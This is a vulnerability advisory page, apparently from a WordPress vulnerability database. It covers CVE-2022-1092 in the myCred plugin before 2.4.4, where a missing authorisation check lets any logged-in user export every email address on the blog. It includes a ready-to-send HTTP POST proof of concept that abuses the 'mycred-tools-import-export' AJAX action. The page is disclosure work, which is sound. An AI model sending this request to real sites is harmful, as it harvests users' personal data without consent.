myCred < 2.4.4 – Subscriber+ Import/Export to Email Address Disclosure | CVE 2022-1092 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks in its mycred-tools-import-export AJAX action, allowing any authenticated user to call and and retrieve the list of email address present in the blog

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 130
Cookie: [any authenticated user]

action=mycred-tools-import-export&request_tab=points&request=export&template=raw&user_field=email&types=%5B%22mycred_default%22%5D

Affects Plugins

Fixed in 2.4.4

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

David Hamann

Submitter

David Hamann

Submitter website

https://davidhamann.de

Submitter twitter

Verified

Yes

WPVDB ID

95759d5c-8802-4493-b7e5-7f2bc546af61

Timeline

Publicly Published

2022-03-29 (about 2 years ago)

Added

2022-03-29 (about 2 years ago)

Last Updated

2022-04-11 (about 2 years ago)

Other

Published

Title

Published

2023-10-06

Title

Bold Timeline Lite < 1.2.0 - Missing Authorization to Admin Notice Dismissal

Published

2024-04-25

Title

Photo Gallery by 10Web < 1.8.21 - Missing Authorization

Published

2022-11-04

Title

Jeg Elementor Kit < 2.5.7 - Unauthenticated Settings Update

Published

2023-11-13

Title

AWeber < 7.3.10 - Missing Authorization via AJAX actions

Published

2024-02-13

Title

Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction < 2.11.2 - Missing Authorization via pms_stripe_connect_handle_authorization_return